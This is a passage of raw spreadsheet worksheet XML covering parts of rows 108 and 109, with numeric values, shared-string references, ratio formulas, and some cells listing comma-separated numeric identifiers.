        <v>22.0</v>
      </c>
      <c r="FE108" s="111">
        <v>141.0</v>
      </c>
      <c r="FF108" s="101" t="s">
        <v>1831</v>
      </c>
      <c r="FG108" s="111" t="s">
        <v>1832</v>
      </c>
      <c r="FH108" s="111">
        <v>17.0</v>
      </c>
      <c r="FI108" s="111">
        <v>108.0</v>
      </c>
      <c r="FJ108" s="111" t="s">
        <v>1833</v>
      </c>
      <c r="FK108" s="111" t="s">
        <v>1834</v>
      </c>
      <c r="FL108" s="111" t="str">
        <f t="shared" si="155"/>
        <v>1917, 15935, 1448, 44486, 44484, 44488, 44487, 44485, 2002752, 2002749, 2101620, 2101917, 2101448, 2101447, 2001329, 2001330, 2003012, 2003020, 2001117, 2044666</v>
      </c>
      <c r="FM108" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN108" s="111" t="s">
        <v>1833</v>
      </c>
      <c r="FO108" s="111" t="s">
        <v>1835</v>
      </c>
      <c r="FP108" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ108" s="111">
        <v>2.0</v>
      </c>
      <c r="FR108" s="111">
        <v>2.0</v>
      </c>
      <c r="FS108" s="112">
        <v>110.0</v>
      </c>
      <c r="FT108" s="112">
        <v>27.0</v>
      </c>
      <c r="FU108" s="112">
        <v>65.0</v>
      </c>
      <c r="FV108" s="112">
        <v>29.0</v>
      </c>
      <c r="FW108" s="112">
        <v>112.0</v>
      </c>
      <c r="FX108" s="112">
        <v>140.0</v>
      </c>
      <c r="FY108" s="112">
        <v>2.0</v>
      </c>
      <c r="FZ108" s="112">
        <v>0.0</v>
      </c>
      <c r="GA108" s="112">
        <v>2.0</v>
      </c>
      <c r="GB108" s="112">
        <v>2.0</v>
      </c>
      <c r="GC108" s="112">
        <v>20.0</v>
      </c>
      <c r="GD108" s="112">
        <v>51.0</v>
      </c>
      <c r="GE108" s="112">
        <v>29.0</v>
      </c>
      <c r="GF108" s="112">
        <v>79.0</v>
      </c>
      <c r="GG108" s="112">
        <v>108.0</v>
      </c>
      <c r="GH108" s="113">
        <f t="shared" si="139"/>
        <v>13.5</v>
      </c>
      <c r="GI108" s="113">
        <f t="shared" si="140"/>
        <v>10</v>
      </c>
      <c r="GJ108" s="113">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="GK108" s="113">
        <f t="shared" si="142"/>
        <v>32.5</v>
      </c>
      <c r="GL108" s="113">
        <f t="shared" si="143"/>
        <v>25.5</v>
      </c>
      <c r="GM108" s="113">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="GN108" s="113">
        <f t="shared" si="145"/>
        <v>70</v>
      </c>
      <c r="GO108" s="113">
        <f t="shared" si="146"/>
        <v>54</v>
      </c>
      <c r="GP108" s="113">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="GQ108" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR108" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS108" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT108" s="94" t="s">
        <v>1836</v>
      </c>
      <c r="GU108" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV108" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW108" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF108" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG108" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH108" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI108" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ108" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK108" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL108" s="93">
        <v>14.0</v>
      </c>
      <c r="HM108" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN108" s="93">
        <v>0.0</v>
      </c>
      <c r="HO108" s="93">
        <v>0.0</v>
      </c>
      <c r="HP108" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ108" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR108" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS108" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT108" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU108" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV108" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW108" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX108" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC108" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH108" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II108" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ108" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK108" s="99">
        <v>3.0</v>
      </c>
      <c r="IL108" s="99">
        <v>0.0</v>
      </c>
      <c r="IM108" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN108" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO108" s="98">
        <v>0.0</v>
      </c>
      <c r="IP108" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ108" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR108" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS108" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT108" s="127"/>
      <c r="IU108" s="127"/>
      <c r="IV108" s="127"/>
      <c r="IW108" s="127"/>
      <c r="IX108" s="127"/>
      <c r="IY108" s="127"/>
      <c r="IZ108" s="127"/>
      <c r="JA108" s="127"/>
      <c r="JB108" s="127"/>
      <c r="JC108" s="127"/>
      <c r="JD108" s="127"/>
      <c r="JE108" s="127"/>
      <c r="JF108" s="127"/>
      <c r="JG108" s="127"/>
      <c r="JH108" s="127"/>
      <c r="JI108" s="127"/>
      <c r="JJ108" s="127"/>
      <c r="JK108" s="127"/>
      <c r="JL108" s="127"/>
      <c r="JM108" s="127"/>
      <c r="JN108" s="127"/>
      <c r="JO108" s="127"/>
      <c r="JP108" s="127"/>
      <c r="JQ108" s="127"/>
      <c r="JR108" s="127"/>
      <c r="JS108" s="127"/>
      <c r="JT108" s="127"/>
      <c r="JU108" s="127"/>
      <c r="JV108" s="127"/>
      <c r="JW108" s="127"/>
      <c r="JX108" s="127"/>
      <c r="JY108" s="127"/>
      <c r="JZ108" s="127"/>
      <c r="KA108" s="127"/>
      <c r="KB108" s="127"/>
      <c r="KC108" s="127"/>
      <c r="KD108" s="127"/>
      <c r="KE108" s="127"/>
      <c r="KF108" s="127"/>
      <c r="KG108" s="127"/>
      <c r="KH108" s="127"/>
      <c r="KI108" s="127"/>
      <c r="KJ108" s="127"/>
      <c r="KK108" s="127"/>
      <c r="KL108" s="127"/>
      <c r="KM108" s="127"/>
      <c r="KN108" s="127"/>
      <c r="KO108" s="127"/>
      <c r="KP108" s="127"/>
      <c r="KQ108" s="127"/>
      <c r="KR108" s="127"/>
      <c r="KS108" s="127"/>
      <c r="KT108" s="127"/>
      <c r="KU108" s="127"/>
      <c r="KV108" s="127"/>
      <c r="KW108" s="127"/>
      <c r="KX108" s="127"/>
      <c r="KY108" s="127"/>
      <c r="KZ108" s="127"/>
      <c r="LA108" s="127"/>
      <c r="LB108" s="127"/>
      <c r="LC108" s="127"/>
      <c r="LD108" s="127"/>
      <c r="LE108" s="127"/>
      <c r="LF108" s="127"/>
      <c r="LG108" s="127"/>
      <c r="LH108" s="127"/>
      <c r="LI108" s="127"/>
      <c r="LJ108" s="127"/>
      <c r="LK108" s="127"/>
      <c r="LL108" s="127"/>
      <c r="LM108" s="127"/>
      <c r="LN108" s="127"/>
      <c r="LO108" s="127"/>
      <c r="LP108" s="127"/>
      <c r="LQ108" s="127"/>
      <c r="LR108" s="127"/>
      <c r="LS108" s="127"/>
      <c r="LT108" s="127"/>
      <c r="LU108" s="127"/>
      <c r="LV108" s="127"/>
      <c r="LW108" s="127"/>
      <c r="LX108" s="127"/>
      <c r="LY108" s="127"/>
      <c r="LZ108" s="127"/>
      <c r="MA108" s="127"/>
      <c r="MB108" s="127"/>
      <c r="MC108" s="127"/>
      <c r="MD108" s="127"/>
      <c r="ME108" s="127"/>
      <c r="MF108" s="127"/>
      <c r="MG108" s="127"/>
      <c r="MH108" s="127"/>
      <c r="MI108" s="127"/>
      <c r="MJ108" s="127"/>
      <c r="MK108" s="127"/>
      <c r="ML108" s="127"/>
      <c r="MM108" s="127"/>
      <c r="MN108" s="127"/>
      <c r="MO108" s="127"/>
      <c r="MP108" s="127"/>
      <c r="MQ108" s="127"/>
      <c r="MR108" s="127"/>
      <c r="MS108" s="127"/>
      <c r="MT108" s="127"/>
      <c r="MU108" s="127"/>
      <c r="MV108" s="127"/>
      <c r="MW108" s="127"/>
      <c r="MX108" s="127"/>
      <c r="MY108" s="127"/>
      <c r="MZ108" s="127"/>
      <c r="NA108" s="127"/>
      <c r="NB108" s="127"/>
      <c r="NC108" s="127"/>
      <c r="ND108" s="127"/>
      <c r="NE108" s="127"/>
      <c r="NF108" s="127"/>
      <c r="NG108" s="127"/>
      <c r="NH108" s="127"/>
      <c r="NI108" s="127"/>
      <c r="NJ108" s="127"/>
      <c r="NK108" s="127"/>
      <c r="NL108" s="127"/>
      <c r="NM108" s="127"/>
      <c r="NN108" s="127"/>
      <c r="NO108" s="127"/>
      <c r="NP108" s="127"/>
      <c r="NQ108" s="127"/>
      <c r="NR108" s="127"/>
      <c r="NS108" s="127"/>
      <c r="NT108" s="127"/>
      <c r="NU108" s="127"/>
      <c r="NV108" s="127"/>
      <c r="NW108" s="127"/>
      <c r="NX108" s="127"/>
      <c r="NY108" s="127"/>
    </row>
    <row r="109" ht="153.75" customHeight="1">
      <c r="B109" s="89" t="s">
        <v>1373</v>
      </c>
      <c r="C109" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D109" s="90" t="s">
        <v>210</v>
      </c>
      <c r="E109" s="90" t="s">
        <v>1837</v>
      </c>
      <c r="F109" s="90" t="s">
        <v>1838</v>
      </c>
      <c r="G109" s="90" t="s">
        <v>1839</v>
      </c>
      <c r="H109" s="90" t="s">
        <v>1840</v>
      </c>
      <c r="I109" s="92" t="s">
        <v>1042</v>
      </c>
      <c r="J109" s="92" t="s">
        <v>1062</v>
      </c>
      <c r="K109" s="92" t="s">
        <v>1841</v>
      </c>
      <c r="L109" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M109" s="93">
        <v>11.0</v>
      </c>
      <c r="N109" s="93">
        <v>1.0</v>
      </c>
      <c r="O109" s="93">
        <v>0.0</v>
      </c>
      <c r="P109" s="93">
        <v>1.0</v>
      </c>
      <c r="Q109" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R109" s="93">
        <v>1.0</v>
      </c>
      <c r="S109" s="93">
        <v>0.0</v>
      </c>
      <c r="T109" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U109" s="98" t="s">
        <v>224</v>
      </c>
      <c r="V109" s="126" t="s">
        <v>1285</v>
      </c>
      <c r="W109" s="126" t="s">
        <v>1842</v>
      </c>
      <c r="X109" s="97" t="s">
        <v>1843</v>
      </c>
      <c r="Y109" s="126" t="s">
        <v>1844</v>
      </c>
      <c r="Z109" s="126" t="s">
        <v>1845</v>
      </c>
      <c r="AA109" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB109" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC109" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD109" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE109" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF109" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG109" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH109" s="99" t="s">
        <v>1047</v>
      </c>
      <c r="AI109" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ109" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL109" s="100">
        <v>0.0</v>
      </c>
      <c r="AM109" s="100">
        <v>0.0</v>
      </c>
      <c r="AN109" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP109" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ109" s="100">
        <v>0.0</v>
      </c>
      <c r="AR109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT109" s="100" t="str">
        <f t="shared" si="164"/>
        <v>-</v>
      </c>
      <c r="AU109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX109" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY109" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ109" s="100">
        <v>0.0</v>
      </c>
      <c r="BA109" s="102">
        <v>11.0</v>
      </c>
      <c r="BB109" s="102">
        <v>0.0</v>
      </c>
      <c r="BC109" s="102">
        <v>0.0</v>
      </c>
      <c r="BD109" s="102">
        <v>0.0</v>
      </c>
      <c r="BE109" s="102">
        <v>0.0</v>
      </c>
      <c r="BF109" s="102">
        <v>0.0</v>
      </c>
      <c r="BG109" s="102">
        <v>0.0</v>
      </c>
      <c r="BH109" s="102">
        <v>0.0</v>
      </c>
      <c r="BI109" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ109" s="102">
        <v>0.0</v>
      </c>
      <c r="BK109" s="102">
        <v>0.0</v>
      </c>
      <c r="BL109" s="103">
        <f>BB109/N106</f>
        <v>0</v>
      </c>
      <c r="BM109" s="103">
        <f>BI109/N106</f>
        <v>0</v>
      </c>
      <c r="BN109" s="103">
        <f>IF(BE109="-","-",BE109/N106)</f>
        <v>0</v>
      </c>
      <c r="BO109" s="103">
        <f>BC109/P106</f>
        <v>0</v>
      </c>
      <c r="BP109" s="103">
        <f>BJ109/P106</f>
        <v>0</v>
      </c>
      <c r="BQ109" s="103">
        <f>IF(BG109="-","-",BG109/P106)</f>
        <v>0</v>
      </c>
      <c r="BR109" s="103">
        <f>BD109/R106</f>
        <v>0</v>
      </c>
      <c r="BS109" s="103">
        <f>BK109/R106</f>
        <v>0</v>
      </c>
      <c r="BT109" s="103">
        <f>IF(BH109="-","-",BH109/R106)</f>
        <v>0</v>
      </c>
      <c r="BU109" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV109" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW109" s="104">
        <v>2006443.0</v>
      </c>
      <c r="BX109" s="104">
        <v>1.0</v>
      </c>
      <c r="BY109" s="104">
        <v>1.0</v>
      </c>
      <c r="BZ109" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA109" s="104">
        <v>2006443.0</v>
      </c>
      <c r="CB109" s="104">
        <v>1.0</v>
      </c>
      <c r="CC109" s="104">
        <v>1.0</v>
      </c>
      <c r="CD109" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE109" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF109" s="104" t="str">
        <f t="shared" si="165"/>
        <v>-</v>
      </c>
      <c r="CG109" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH109" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI109" s="104">
        <v>2006443.0</v>
      </c>
      <c r="CJ109" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK109" s="104">
        <v>1.0</v>
      </c>
      <c r="CL109" s="104">
        <v>1.0</v>
      </c>
      <c r="CM109" s="105">
        <v>11.0</v>
      </c>
      <c r="CN109" s="105">
        <v>1.0</v>
      </c>
      <c r="CO109" s="105">
        <v>1.0</v>
      </c>
      <c r="CP109" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ109" s="105">
        <v>1.0</v>
      </c>
      <c r="CR109" s="105">
        <v>1.0</v>
      </c>
      <c r="CS109" s="105">
        <v>1.0</v>
      </c>
      <c r="CT109" s="105">
        <v>0.0</v>
      </c>
      <c r="CU109" s="105">
        <v>1.0</v>
      </c>
      <c r="CV109" s="105">
        <v>1.0</v>
      </c>
      <c r="CW109" s="105">
        <v>1.0</v>
      </c>
      <c r="CX109" s="105">
        <v>1.0</v>
      </c>
      <c r="CY109" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ109" s="105">
        <v>1.0</v>
      </c>
      <c r="DA109" s="105">
        <v>1.0</v>
      </c>
      <c r="DB109" s="106">
        <f>CN109/N106</f>
        <v>1</v>
      </c>
      <c r="DC109" s="106">
        <f>CW109/N106</f>
        <v>1</v>
      </c>
      <c r="DD109" s="106">
        <f>IF(CS109="-","-",CS109/N106)</f>
        <v>1</v>
      </c>
      <c r="DE109" s="106">
        <f>CO109/P106</f>
        <v>1</v>
      </c>
      <c r="DF109" s="106">
        <f>CX109/P106</f>
        <v>1</v>
      </c>
      <c r="DG109" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH109" s="106">
        <f>IF(CR109="-","-",CR109/R106)</f>
        <v>1</v>
      </c>
      <c r="DI109" s="106">
        <f>IF(DA109="-","-",DA109/R106)</f>
        <v>1</v>
      </c>
      <c r="DJ109" s="106">
        <f>IF(CV109="-","-",CV109/R106)</f>
        <v>1</v>
      </c>
      <c r="DK109" s="107">
        <f t="shared" si="104"/>
        <v>1</v>
      </c>
      <c r="DL109" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM109" s="108" t="s">
        <v>1846</v>
      </c>
      <c r="DN109" s="108">
        <v>1.0</v>
      </c>
      <c r="DO109" s="108">
        <v>3.0</v>
      </c>
      <c r="DP109" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ109" s="108" t="s">
        <v>1846</v>
      </c>
      <c r="DR109" s="108">
        <v>1.0</v>
      </c>
      <c r="DS109" s="108">
        <v>3.0</v>
      </c>
      <c r="DT109" s="108">
        <v>50447.0</v>
      </c>
      <c r="DU109" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV109" s="108">
        <f t="shared" si="166"/>
        <v>50447</v>
      </c>
      <c r="DW109" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX109" s="108">
        <v>50447.0</v>
      </c>
      <c r="DY109" s="108">
        <v>2006443.0</v>
      </c>
      <c r="DZ109" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA109" s="108">
        <v>1.0</v>
      </c>
      <c r="EB109" s="108">
        <v>1.0</v>
      </c>
      <c r="EC109" s="109">
        <v>11.0</v>
      </c>
      <c r="ED109" s="109">
        <v>1.0</v>
      </c>
      <c r="EE109" s="109">
        <v>2.0</v>
      </c>
      <c r="EF109" s="109">
        <v>1.0</v>
      </c>
      <c r="EG109" s="109">
        <v>1.0</v>
      </c>
      <c r="EH109" s="109">
        <v>2.0</v>
      </c>
      <c r="EI109" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ109" s="109">
        <v>0.0</v>
      </c>
      <c r="EK109" s="109">
        <v>1.0</v>
      </c>
      <c r="EL109" s="109">
        <v>1.0</v>
      </c>
      <c r="EM109" s="109">
        <v>1.0</v>
      </c>
      <c r="EN109" s="109">
        <v>2.0</v>
      </c>
      <c r="EO109" s="109">
        <v>1.0</v>
      </c>
      <c r="EP109" s="109">
        <v>1.0</v>
      </c>
      <c r="EQ109" s="109">
        <v>2.0</v>
      </c>
      <c r="ER109" s="110">
        <f>ED109/N106</f>
        <v>1</v>
      </c>
      <c r="ES109" s="110">
        <f>EM109/N106</f>
        <v>1</v>
      </c>
      <c r="ET109" s="110">
        <f>IF(EI109="-","-",EI109/N106)</f>
        <v>1</v>
      </c>
      <c r="EU109" s="110">
        <f>EE109/P106</f>
        <v>2</v>
      </c>
      <c r="EV109" s="110">
        <f>EN109/P106</f>
        <v>2</v>
      </c>
      <c r="EW109" s="110">
        <f>IF(EK109="-","-",EK109/P106)</f>
        <v>1</v>
      </c>
      <c r="EX109" s="110">
        <f>IF(EH109="-","-",EH109/R106)</f>
        <v>2</v>
      </c>
      <c r="EY109" s="110">
        <f>IF(EQ109="-","-",EQ109/R106)</f>
        <v>2</v>
      </c>
      <c r="EZ109" s="110">
        <f>IF(EL109="-","-",EL109/R106)</f>
        <v>1</v>
      </c>
      <c r="FA109" s="110">
        <f t="shared" si="106"/>
        <v>1</v>
      </c>
      <c r="FB109" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC109" s="111" t="s">
        <v>1847</v>
      </c>
      <c r="FD109" s="111">
        <v>4.0</v>
      </c>
      <c r="FE109" s="111">
        <v>6.0</v>
      </c>
      <c r="FF109" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG109" s="111" t="s">
        <v>1846</v>
      </c>
      <c r="FH109" s="111">
        <v>2.0</v>
      </c>
      <c r="FI109" s="111">
        <v>2.0</v>
      </c>
      <c r="FJ109" s="111" t="s">
        <v>1069</v>
      </c>
      <c r="FK109" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FL109" s="111" t="str">
        <f t="shared" si="155"/>
        <v>2002752, 2002749, 50447</v>
      </c>
      <c r="FM109" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN109" s="111" t="s">
        <v>1069</v>
      </c>
      <c r="FO109" s="111">
        <v>2006443.0</v>
      </c>
      <c r="FP109" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ109" s="111">
        <v>1.0</v>
      </c>
      <c r="FR109" s="111">
        <v>1.0</v>
      </c>
      <c r="FS109" s="112">
        <v>11.0</v>
      </c>
      <c r="FT109" s="112">
        <v>2.0</v>
      </c>
      <c r="FU109" s="112">
        <v>4.0</v>
      </c>
      <c r="FV109" s="112">
        <v>1.0</v>
      </c>
      <c r="FW109" s="112">
        <v>5.0</v>
      </c>
      <c r="FX109" s="112">
        <v>6.0</v>
      </c>
      <c r="FY109" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ109" s="112">
        <v>0.0</v>
      </c>
      <c r="GA109" s="112">
        <v>1.0</v>
      </c>
      <c r="GB109" s="112">
        <v>1.0</v>
      </c>
      <c r="GC109" s="112">
        <v>1.0</v>
      </c>
      <c r="GD109" s="112">
        <v>2.0</v>
      </c>
      <c r="GE109" s="112">
        <v>1.0</v>
      </c>
      <c r="GF109" s="112">
        <v>1.0</v>
      </c>
      <c r="GG109" s="112">
        <v>2.0</v>
      </c>
      <c r="GH109" s="113">
        <f>FT109/N106</f>
        <v>2</v>
      </c>
      <c r="GI109" s="113">
        <f>GC109/N106</f>
        <v>1</v>
      </c>
      <c r="GJ109" s="113">
        <f>IF(FY109="-","-",FY109/N106)</f>
        <v>1</v>
      </c>
      <c r="GK109" s="113">
        <f>FU109/P106</f>
        <v>4</v>
      </c>
      <c r="GL109" s="113">
        <f>GD109/P106</f>
        <v>2</v>
      </c>
      <c r="GM109" s="113">
        <f>IF(GA109="-","-",GA109/P106)</f>
        <v>1</v>
      </c>
      <c r="GN109" s="113">
        <f>IF(FX109="-","-",FX109/R106)</f>
        <v>6</v>
      </c>
      <c r="GO109" s="113">
        <f>IF(GG109="-","-",GG109/R106)</f>
        <v>2</v>
      </c>
      <c r="GP109" s="113">
        <f>IF(GB109="-","-",GB109/R106)</f>
        <v>1</v>
      </c>
      <c r="GQ109" s="114">
        <f t="shared" si="108"/>
        <v>1</v>
      </c>
      <c r="GR109" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS109" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT109" s="94"/>
      <c r="GU109" s="116">
        <v>15621.0</v>
      </c>
      <c r="GV109" s="116">
        <v>1.0</v>
      </c>
      <c r="GW109" s="116">
        <v>1.0</v>
      </c>
      <c r="GX109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD109" s="131">
        <v>15621.0</v>
      </c>
      <c r="HE109" s="131">
        <v>15621.0</v>
      </c>
      <c r="HF109" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG109" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH109" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI109" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ109" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK109" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL109" s="93">
        <v>11.0</v>
      </c>
      <c r="HM109" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN109" s="93">
        <v>1.0</v>
      </c>
      <c r="HO109" s="93">
        <v>0.0</v>
      </c>
      <c r="HP109" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ109" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR109" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS109" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT109" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU109" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV109" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW109" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX109" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC109" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH109" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II109" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ109" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK109" s="99">
        <v>11.0</v>
      </c>
      <c r="IL109" s="99">
        <v>0.0</v>
      </c>
      <c r="IM109" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN109" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO109" s="98">
        <v>0.0</v>
      </c>
      <c r="IP109" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ109" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR109" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS109" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT109" s="127"/>
      <c r="IU109" s="127"/>
      <c r="IV109" s="127"/>
      <c r="IW109" s="127"/>
      <c r="IX109" s="127"/>
      <c r="IY109" s="127"/>
      <c r="IZ109" s="127"/>
      <c r="JA109" s="127"/>
      <c r="JB109" s="127"/>
      <c r="JC109" s="127"/>
      <c r="JD109" s="127"/>
      <c r="JE109" s="127"/>
      <c r="JF109" s="127"/>
      <c r="JG109" s="127"/>
      <c r="JH109" s="127"/>
      <c r="JI109" s="127"/>
      <c r="JJ109" s="127"/>
      <c r="JK109" s="127"/>
      <c r="JL109" s="127"/>
      <c r="JM109" s="127"/>
      <c r="JN109" s="127"/>
      <c r="JO109" s="127"/>
      <c r="JP109" s="127"/>
      <c r="JQ109" s="127"/>
      <c r="JR109" s="127"/>
      <c r="JS109" s="127"/>
      <c r="JT109" s="127"/>
      <c r="JU109" s="127"/>
      <c r="JV109" s="127"/>
      <c r="JW109" s="127"/>
      <c r="JX109" s="127"/>
      <c r="JY109" s="127"/>
      <c r="JZ109" s="127"/>
      <c r="KA109" s="127"/>
      <c r="KB109" s="127"/>
      <c r="KC109" s="127"/>
      <c r="KD109" s="127"/>
      <c r="KE109" s="127"/>
      <c r="KF109" s="127"/>
      <c r="KG109" s="127"/>
      <c r="KH109" s="127"/>
      <c r="KI109" s="127"/>
